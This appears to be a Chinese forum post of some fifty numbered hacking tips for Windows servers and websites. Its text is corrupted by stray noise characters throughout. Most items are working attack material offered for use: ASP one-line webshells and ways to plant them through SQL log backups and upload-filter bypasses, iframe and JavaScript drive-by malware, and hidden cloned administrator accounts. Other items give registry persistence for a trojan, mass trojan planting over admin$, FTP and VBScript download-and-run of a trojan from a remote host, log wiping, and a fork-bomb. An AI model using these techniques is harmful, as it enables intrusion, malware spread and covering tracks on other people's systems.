Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
, E6 s' X) G: Xcacls C:\windows\system32 /G hqw20:R T6 U- Z* S+ N8 E7 B
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入) ^: c* e; n% p' B5 ^8 d
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
! I% x: t" }8 H* e c+ S" y" H% [! `
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
# e; h5 |. r% l5 z1 q f* O0 q7 S8 \; ?2 } W
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。4 Q% H5 d9 o+ }" X5 ^
# {& p/ O7 c+ }) k4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
, F% o2 a: g' ~' v
; \" b4 d& @, J5 c2 M5、利用INF文件来修改注册表/ v8 Y9 e( T' q" D% J4 H+ L5 S
[Version]
* O4 v& y! y3 D" q# wSignature="$CHICAGO$"
) R4 b) p" ^, @1 V( K) F$ B[Defaultinstall]) @3 Z% B+ i8 p$ _4 N5 w
addREG=Ating
- o- {$ D$ L# ~+ z# i8 x# Z[Ating]
' j' x1 Q- Y3 n& yHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
( e0 f `! V# `6 f3 a7 ^以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
6 a5 |4 Z' c4 k5 ~rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径( P- \+ ?( a" V) c
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
: n( B. m' W2 K) S; oHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU9 Z- ], P& o' d
HKEY_CURRENT_CONFIG 简写为 HKCC
- s7 b8 t9 g5 n) U; W" x8 e: t# B0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
& l- L* \6 D' ~6 C3 `( y( G W1 S"1"这里代表是写入或删除注册表键值中的具体数据 Z T# d% t; e7 L* H
& c4 }" O v# u/ I* Z6 `6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,1 F W' u% n5 _/ }* z* v
多了一步就是在防火墙里添加个端口,然后导出其键值
* C0 w* U0 s" O- J3 c1 R+ r[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
7 S8 B5 z; K" `0 w
% y x% b, K6 j3 A& u, T# M7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽6 \ x7 q% Y0 q8 R) P
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
( K6 u+ N# o6 ~
: |4 P T1 z0 [. [8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
d" ^: |: g: f$ P6 e* s+ t
) l. M8 j' |: e/ ^9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
7 `5 u) Q. {% d) u( o: ~) w可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。- M% A* P2 K; u1 a! R& q
: h( E) d" [, |10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”, _) @: @: `+ n# J5 g1 B: q# Y, X; Z1 f
( O, x* F8 L( i0 j2 r
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
" H9 @( W6 T6 S. F; k用法:xsniff –pass –hide –log pass.txt
; B1 B. t4 y: A+ V2 o* F
6 y3 {; Y% Z5 t o# D8 [$ H) i12、google搜索的艺术% T. y" {/ c1 B% @- w
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”! S+ f4 o6 B5 o8 T r7 w- n3 R# v
或“字符串的语法错误”可以找到很多sql注入漏洞。% I& K4 s4 a( T6 H. v( G5 L
/ [7 p8 C9 A; y9 `6 i13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。* X2 j' G- Y3 h
! I4 }, U/ l- Z# R9 T. W! w* T
14、cmd中输入 nc –vv –l –p 1987
8 l9 l. x3 w9 y0 ]1 J做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃6 C- r2 z2 `/ |8 o/ q0 |
/ ?! a7 I* x; q( \9 y4 ^( j15、制作T++木马,先写个ating.hta文件,内容为
m! U: Z6 B/ [4 T; k<script language="VBScript">
; t' | j* r0 ]+ Oset wshshell=createobject ("wscript.shell" )* R" B. i( Z; W' U" e0 b9 r
a=wshshell.run("你马的名称",1)& A4 x" n: U; W9 v
window.close5 |- p n( ?- j" u
</script>) U* [2 L: M2 p7 U; v$ I' |( N
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。4 H2 [' F: w& O0 f/ P7 }
6 P% Y* H; x- C+ T7 x# r: A4 K16、搜索栏里输入
( X- H! M2 `3 i7 }% z关键字%'and 1=1 and '%'='
$ ? k/ k( O% @2 \$ E4 g( W+ \8 S关键字%'and 1=2 and '%'='
; B+ _7 y& F8 j比较不同处 可以作为注入的特征字符
) ` T! k; `2 S9 V+ d. |' b1 U |
17、挂马代码<html>
8 O2 @% G0 Q) X1 @$ b<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>* ^4 ]7 v' L3 o5 p* x
</html>4 Y# ]. {4 ~' E5 y: D p9 h; Q
F! E3 }9 j. s6 |& \* V1 j
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
' Z9 E B8 q- fnet localgroup administrators还是可以看出Guest是管理员来。
% Q, x& S5 x2 @' n
M+ G/ q1 `+ {* z I19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等, Y+ L2 w% z# W: \$ B" x
用法: 安装: instsrv.exe 服务名称 路径8 ^2 b7 j7 N7 o) ~
卸载: instsrv.exe 服务名称 REMOVE
2 p7 O9 _% E4 F) x9 n- g
9 i, A% _" @6 C9 R7 S) O8 w4 `, T1 v+ d9 ]
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
: q2 E1 i) W7 i8 W6 i不能注入时要第一时间想到%5c暴库。# J1 I/ X: {' |0 Q6 E+ y. V$ F. t
1 K* ]7 m9 A# n g3 J- a
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
* @! _ b5 G% S$ \" \# n. q2 ?$ U; i% D: C/ v
23、缺少xp_cmdshell时
+ w" f; d3 {* R: x6 B尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
. y$ h; W6 ^) H0 B; |6 U! W% i假如恢复不成功,可以尝试直接加用户(针对开3389的)
" ~- [* ~9 O: h1 x; f; E9 ?declare @o int- _4 G, i- `6 j. J
exec sp_oacreate 'wscript.shell',@o out( f& U0 b m6 E# x5 X! m/ x& c
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
2 c q( k" w. }& W* {3 c# D! t5 y2 j& n1 Q8 \& S% Q) P
24.批量种植木马.bat
: }+ y- Y0 K" J, z) }! }for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
. F: L0 ]# a; k. |' Ifor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
* O9 r6 o l0 N* @扫描地址.txt里每个主机名一行 用\\开头
5 |* P$ }' a' C. @0 i2 m8 T
! j }7 F" ?8 k: E" W0 Q25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。* D2 K: }; X6 i
0 v, P2 n! \' s7 N26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
9 x9 @7 y; }- @: R) |将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
1 H$ @& F) f' L.cer 等后缀的文件夹下都可以运行任何后缀的asp木马+ z$ X5 H* Q8 U; `
" I1 s9 ~$ I) L2 z, Z5 b8 y! m27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
) H m' q) L7 Q然后用#clear logg和#clear line vty *删除日志
. F" V6 [! }% l' {: ~
+ o$ u9 w0 G" e" B( F% t28、电脑坏了省去重新安装系统的方法
( A9 k6 s- ]0 C* d# |% G) R纯dos下执行,: F; }- n# c7 o. W. d0 y0 L) d# v% {
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
. [. u% K$ F3 A1 j; j2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
- _" W" W3 r# q" p* s+ S R! K- X7 b7 o7 H% f7 r0 K! P
29、解决TCP/IP筛选 在注册表里有三处,分别是:! I% |9 s- d- B1 J& }
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
) p) a! w+ b, b; xHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip' N8 w0 @; @. A% I
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip5 l8 P* H. E/ c9 Q
分别用. e% s% y) j% l- n% |* B5 l; k1 v' G
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, ]0 j! S7 s1 w/ ]0 K7 V( M3 S
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ J4 F6 i$ }% Wregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: K5 d5 T$ r5 ?7 X5 @命令来导出注册表项( ]2 p, Q7 c, I! a6 Q* S; h+ X
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
9 F4 N1 d0 P$ z; j改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用$ i! H3 z2 |3 G. H) |
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
* y6 m! b5 |% ^8 r4 F7 s. D L' g
8 F0 I9 P; r, g- w: K30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
( e8 U3 k- r$ k/ B% X7 H/ HSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
; ^" P) {( I0 `. J g/ i! j3 r! H+ Q7 u/ [: L2 U
31、全手工打造开3389工具
2 Y. p9 p/ z6 w% }' M打开记事本,编辑内容如下:6 | x0 L& n; h5 m a1 Y {
echo [Components] > c:\sql) P) N4 R% M. }1 o+ G7 j
echo TSEnable = on >> c:\sql
1 d3 {/ |( K1 r7 l$ k: ssysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
& j- g! C! U5 ~2 i编辑好后存为BAT文件,上传至肉鸡,执行
- X" }* L9 \) Y) G, c9 p) a" k) m4 q* \" k f3 _
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
) C; p9 g# M! B# y- A' R1 W+ h
g9 x/ q# ~# u$ _2 P33、让服务器重启% H7 m1 {; T- |, ^* @' {+ D( U$ C
写个bat死循环:
) M( c5 {; q6 X5 @: B@echo off2 \& T* d; ^' ~+ R5 g# y9 D
:loop19 M% w4 ?, ^3 q0 G
cls4 q& j* _4 E- [% ]. J
start cmd.exe- Y, i8 d, d) V4 |' z9 n, S
goto loop1
5 x: G( A' f, h! A* v* D( k/ C保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
2 J; w. L: I9 y
9 o% B/ C$ i1 v- z0 _34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,# N3 z m% L8 y% A
@echo off
0 K4 v+ _; B. c- a' z3 Qdate /t >c:/3389.txt
9 |( b: X: T2 j& wtime /t >>c:/3389.txt9 T1 O- P- g" F/ J
attrib +s +h c:/3389.bat [/ e5 I9 b! n. M" N
attrib +s +h c:/3389.txt Y/ E: k7 D) U) c8 K0 C/ ^
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
. b3 g- k) A" ~$ r/ ?4 U0 Y2 z" {并保存为3389.bat+ m5 E9 G/ P9 k' d X& A4 u
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
1 l: H9 T0 J/ p* s# X9 [! e; P0 b4 U
35、有时候提不了权限的话,试试这个命令,在命令行里输入:' A6 `* {7 {" `5 [- i( a* r
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
O$ ]* T/ y m3 U) [输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。* S0 u& o) U9 V3 _
4 G" s1 M; `/ S36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件1 | M7 ~4 Q+ R x. M( e
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
6 q S) N7 @5 n# p5 Recho 你的FTP账号 >>c:\1.bat //输入账号
5 a# c5 H) Y. |. r1 a8 n! T+ F$ Uecho 你的FTP密码 >>c:\1.bat //输入密码
& x: Z( e3 m3 Mecho bin >>c:\1.bat //登入
4 A }% u. C6 D: V8 ]/ ]echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
L) H1 [5 ?. s# U: @echo bye >>c:\1.bat //退出
# X5 u I% ?" T! r% Q然后执行ftp -s:c:\1.bat即可, R7 j- [' U2 }! o$ @2 z l/ g
9 r" X0 W$ \4 U0 G& v) a
37、修改注册表开3389两法
9 R4 P1 G! F; h1 ](1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
( Y/ W7 @. N5 I: pecho Windows Registry Editor Version 5.00 >>3389.reg
( w& j, ?5 H/ a8 jecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg- M. v7 S* i2 D: D( k! J$ A
echo "Enabled"="0" >>3389.reg6 ?* g3 a+ A" q9 P" ?
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows( \9 o ^2 l$ L! H, F, q8 ?: R
NT\CurrentVersion\Winlogon] >>3389.reg! N1 f) f% Z. z- c- z+ q/ M9 W7 t @
echo "ShutdownWithoutLogon"="0" >>3389.reg
) y; y$ o2 }1 G) y: F& Qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
# T# j. z- m1 Q>>3389.reg1 K3 |; a. X8 H/ v' T6 o
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg* d8 F8 w9 B5 E' N9 ]8 v. p' s# z# h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
' ?4 R- p- j# t4 E: [; A+ v! h>>3389.reg
7 P4 q; T9 S: o; P' mecho "TSEnabled"=dword:00000001 >>3389.reg
/ F' g W u- {2 e. @- H; ^, @) eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
2 S" U: Y$ d0 X" i8 l% Hecho "Start"=dword:00000002 >>3389.reg3 V( \# k# Y u& |# M$ X% R! {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
9 @0 ~$ b5 U; N& [>>3389.reg
5 S5 R; l3 r$ qecho "Start"=dword:00000002 >>3389.reg* W1 U, T9 _- u4 X$ S
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg n A7 E9 x4 k# f" [3 x9 B, D
echo "Hotkey"="1" >>3389.reg
' |7 N1 W' ~ n+ |; X# ?8 a. y secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( Q, ?- M4 Z8 r
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
" D: g( L. a7 `3 |) \echo "PortNumber"=dword:00000D3D >>3389.reg
' Q# C6 m% e o9 c$ q1 Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 r% t/ ]! G2 a& X! M" |/ D* `Server\WinStations\RDP-Tcp] >>3389.reg/ x5 ?: _) E1 b, l
echo "PortNumber"=dword:00000D3D >>3389.reg+ |: u" L- q5 l4 x$ ]. p
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。; ~5 w1 |" Q3 n6 Q) r/ H
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
& }6 ^2 Z5 {9 h P$ N" p- |因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
& Z; \" l A( q3 _! q(2)winxp和win2003终端开启; ]( u$ v5 F4 M) s# H
用以下ECHO代码写一个REG文件:
% W" J9 j5 b) L* h+ _3 ?5 vecho Windows Registry Editor Version 5.00>>3389.reg% |) \6 Q- y( i3 X" ?( Y8 j' r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& r0 B) I% U8 ]) k/ o7 ^2 Y" \Server]>>3389.reg
. T2 ~: h4 v+ W5 Q. e+ eecho "fDenyTSConnections"=dword:00000000>>3389.reg' f; d$ A! V6 W1 ]. g: a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& i* I8 U: }0 i. [3 _Server\Wds\rdpwd\Tds\tcp]>>3389.reg
2 ~& M' R/ \2 @- ]echo "PortNumber"=dword:00000d3d>>3389.reg# l3 Y: D% z" u' n4 b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 e5 p- t% n( Z+ x8 uServer\WinStations\RDP-Tcp]>>3389.reg
5 Q! M* O/ A- N/ L) X; Iecho "PortNumber"=dword:00000d3d>>3389.reg
6 L. X A: T9 v$ d然后regedit /s 3389.reg del 3389.reg4 k# c( ]. U; T7 p7 m7 t
XP下不论开终端还是改终端端口都不需重启6 X; H" a7 y7 T. w$ C
( B5 z4 X: f/ o( V* F4 W( E7 E; t38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
6 b/ c7 m0 _* n" t/ o) W用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa') m y' k& W6 A( @- a' c
5 \% c- P" Y& M- q8 h5 s" J39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的! `, g9 Z3 r9 a, z# l
(1)数据库文件名应复杂并要有特殊字符
9 k1 Y6 ]* G, F3 s4 M: @6 D. C; n1 \(2)不要把数据库名称写在conn.asp里,要用ODBC数据源8 q ]8 b# h# O2 g: W, y
将conn.asp文档中的
$ ~1 P4 E, Q% _- [/ s- C0 HDBPath = Server.MapPath("数据库.mdb")
3 q. g. ?: T9 L, H+ a9 Qconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
5 \- y5 a7 S {6 U" F0 [9 ^4 z8 g$ \- n$ W
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置% e. T' `8 ~. _' b$ \
(3)不放在WEB目录里
/ [/ M& Y F& E5 X3 t* d4 O
& \" N1 T$ s$ L40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
1 ~" w# B C7 w. u' v6 T8 D可以写两个bat文件3 J( M/ D) I! F- g/ k% v! `! M
@echo off3 |2 i/ x( {7 V; ?+ f( e
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
- i! o7 T, s6 h( x6 e5 L, F3 M@del c:\winnt\system32\query.exe4 x! Z0 x, f2 |" C" d$ _1 p* [+ z
@del %SYSTEMROOT%\system32\dllcache\query.exe
5 N6 U' Y& m8 @% Z2 k@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的9 J/ `; Y' c5 C0 T0 Z o! a. f
- t4 m& x! R, C* C$ D7 M
@echo off
7 s1 R7 m$ q' L/ {3 ?9 m* w@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
. j1 i9 W. h [2 Y! V7 m! C8 v@del c:\winnt\system32\tsadmin.exe
7 Y" h. `2 p! {9 K+ M) f+ ~@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
. G/ s" P7 V6 O7 }/ `: P( g1 x% x
! [; ~/ W1 |6 f3 @0 p$ s41、映射对方盘符0 Z$ L2 N" S0 x$ M6 T
telnet到他的机器上,# A5 D4 k5 m' a( V- j2 W4 n
net share 查看有没有默认共享 如果没有,那么就接着运行7 z+ Q B( O1 U+ }" D2 L
net share c$=c:
* R, b( h. P, L7 ~7 W, \net share现在有c$4 U, m3 B" d1 s6 o- X/ O) |
在自己的机器上运行2 H$ S _% B* p$ W
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K( ]: k7 S' f4 M& F% [
' J7 j0 D' t2 u8 a( `7 f) _/ s42、一些很有用的老知识; G$ H% I1 o( ?8 }: `: o N# C
type c:\boot.ini ( 查看系统版本 )! j+ T3 ]( N/ l ^$ \, G$ _# v; R9 p- t
net start (查看已经启动的服务)
. T7 s7 q/ O1 h: S0 g. Tquery user ( 查看当前终端连接 )% C8 p5 s' `5 n% a
net user ( 查看当前用户 )
; O; P4 A1 e7 C4 P" F6 J4 A# anet user 用户 密码/add ( 建立账号 )3 T& ~3 A. {6 ]5 P$ o
net localgroup administrators 用户 /add (提升某用户为管理员)9 h+ l8 ]; P% A o
ipconfig -all ( 查看IP什么的 )) |' U( M- B4 l2 u
netstat -an ( 查看当前网络状态 )
$ _; Z2 e$ S& Afindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
* |& E. J4 T, K7 u0 l克隆时Administrator对应1F4
: j( i' M0 a Y, b! W$ Eguest对应1F5
3 B1 [ @; ]2 P7 w3 p/ W+ l* M+ S9 \tsinternetuser对应3E8: Q5 Q K4 U$ h
8 m! V8 _* p3 k3 ?4 I2 m43、如果对方没开3389,但是装了Remote Administrator Service o( Y! C) }# }
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
1 `4 K2 E. S0 _0 f6 N; e- t解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
4 ]; i0 D" v6 f, K! R% f: P! |/ q先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"& C: k& @, R& t
" B8 J: M- f+ Y" s. L+ p# B! z44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
: ?" ]$ n/ V9 Z& i( G本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
) ^/ o. P! ]+ l& V. V. E' X+ J# A# c- G3 }4 n) E% Q
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)" i# Z8 ?- m' [
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open2 g1 t4 X: H$ I- s s, _
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
2 N$ z! B. ~& K* M3 t, ^0 f9 |4 ECreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =! F% C) n! @- K6 U7 B5 d5 W2 I& X
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs; D% [* a6 L3 Q0 l
(这是完整的一句话,其中没有换行符)
; l- Y9 B: S. Q+ o, h然后下载:
9 o z% U4 O. hcscript down.vbs http://www.hack520.org/hack.exe hack.exe; W$ q" G, l, L8 x0 R0 e" |; l( n# W3 {
; M2 p( y- i H- U1 M8 {* N46、一句话木马成功依赖于两个条件:5 I/ |' Q4 \) l3 d1 k4 i- o+ o' `
1、服务端没有禁止adodb.Stream或FSO组件0 k* W) l6 F4 o( o) ?% J
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
: l# I- v% ~- ^5 |1 ~* ]% X' r4 {, R7 L" l$ e' }0 _
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
' Q/ s3 @; B n$ q6 z' ^;alter database utsz set RECOVERY FULL--
& N. p# `, A" [7 X;create table cmd (a image)--
( f# q, V. e$ d' C/ ?9 K& ~7 r2 I( o;backup log utsz to disk = 'D:\cmd' with init--6 t6 G) R. t& F' k! k+ _# @
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--! F/ F0 i7 H. s* i, W8 O
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
" I6 _& f, r6 u7 o2 h注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。; Z& O4 z4 i# P4 J" t1 R
0 P, @ A; G" o }0 U: r
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
8 U [2 F0 B8 x1 ^7 D7 P: M& E+ x' m
6 f ^9 c/ F- } }; C4 N; L" {用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
6 ~/ ?8 \( G7 u- l w* }& \所有会话用 'all'。1 l8 g; `3 V- [* |: e4 ]2 _! N
-s sessionid 列出会话的信息。
" F& a6 `- N5 a-k sessionid 终止会话。+ ]' C. i2 `1 G" s
-m sessionid 发送消息到会话。
/ Y9 v& _7 t" D' Z, K
0 n" R3 z1 ]* v# G3 R6 \! q7 Pconfig 配置 telnet 服务器参数。
: I- l1 A/ T" o# T
/ b4 r, b0 G: `: E! u# c9 g! Q2 jcommon_options 为:
0 K! {. I p8 S6 R6 a5 X! M-u user 指定要使用其凭据的用户
+ v: c/ y$ `; e1 b5 A$ t3 m-p password 用户密码% w; C. \. q: c/ h* S) @) i. p; U. Y
+ C1 [, S* s# X( E* F Q' jconfig_options 为:
U& m' s' v' s3 ^) l- odom = domain 设定用户的默认域
; R, b* J( ?: c- U& D: `! Y# ~. \ctrlakeymap = yes|no 设定 ALT 键的映射
2 M* [4 u# U" Z7 l8 ]8 Jtimeout = hh:mm:ss 设定空闲会话超时值! x+ M% e/ r" f9 V* j
timeoutactive = yes|no 启用空闲会话。, V7 p' l0 `* t' i! w
maxfail = attempts 设定断开前失败的登录企图数。+ {* N, A. Z/ Q# m+ C- R) b
maxconn = connections 设定最大连接数。8 h# n" x7 f9 f4 J g
port = number 设定 telnet 端口。9 e' M# `' A z/ Y
sec = [+/-]NTLM [+/-]passwd
9 H% z9 j* Z4 ~6 n# A2 l" @ y) x设定身份验证机构
" ]7 ?0 `, K4 F$ N6 r) U/ }fname = file 指定审计文件名。7 |" I, H4 _) ?( h
fsize = size 指定审计文件的最大尺寸(MB)。$ h2 D2 _0 z4 R( T3 t4 w6 L
mode = console|stream 指定操作模式。
% T; Z) a0 ~* Z% ?0 B `+ u* I! r# vauditlocation = eventlog|file|both# }$ p' f7 A) D& P) b$ ~* x( |1 U
指定记录地点
% ^1 [8 }9 f0 Qaudit = [+/-]user [+/-]fail [+/-]admin
: J( W+ }2 ?5 k5 |: `% h
, [5 R6 X: W D7 W3 I7 u- r49、例如:在IE上访问:, b# D7 u Q7 @1 R% m" b( Z; h* h
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
7 D/ F5 G7 Q4 bhack.txt里面的代码是:
; P! @2 F4 S, Q' Q% e) {8 Z% F/ i<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
0 f0 `# o0 X4 _1 }8 q把这个hack.txt发到你空间就可以了!
0 Z ~4 Y9 ?5 ?9 A6 ^" z这个可以利用来做网马哦!
2 A7 @ U o8 F
' R% p% B; D F' E50、autorun的病毒可以通过手动限制!
% y- a) U: ^; z2 A( P! H$ ?/ B1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!2 @0 R1 O1 V- s I7 `8 b6 O* ^
2,打开盘符用右键打开!切忌双击盘符~9 Y7 L( Y1 C, i
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!( `* ^$ \% I6 q
, ~1 M- N! w2 A51、log备份时的一句话木马:0 {: G) p- A0 l. \" U% z0 e5 m- I
a).<%%25Execute(request("go"))%%25>
3 |+ N. c: i: W6 h0 |) Pb).<%Execute(request("go"))%>1 b! f8 N2 A6 {" u' A9 ^! e
c).%><%execute request("go")%><%4 S0 t0 G9 \8 u% T! k
d).<script language=VBScript runat=server>execute request("sb")</Script>
+ d# V0 T3 D: t( L! D/ j( s' Qe).<%25Execute(request("l"))%25>% u6 M- R* }) z* S
f).<%if request("cmd")<>"" then execute request("pass")%>
4 W: u7 s& k1 |5 u, j' f; {# B
5 C# J8 |6 k6 i; c) m; l3 l52、at "12:17" /interactive cmd
7 M B- _ V( c* R执行后可以用AT命令查看新加的任务
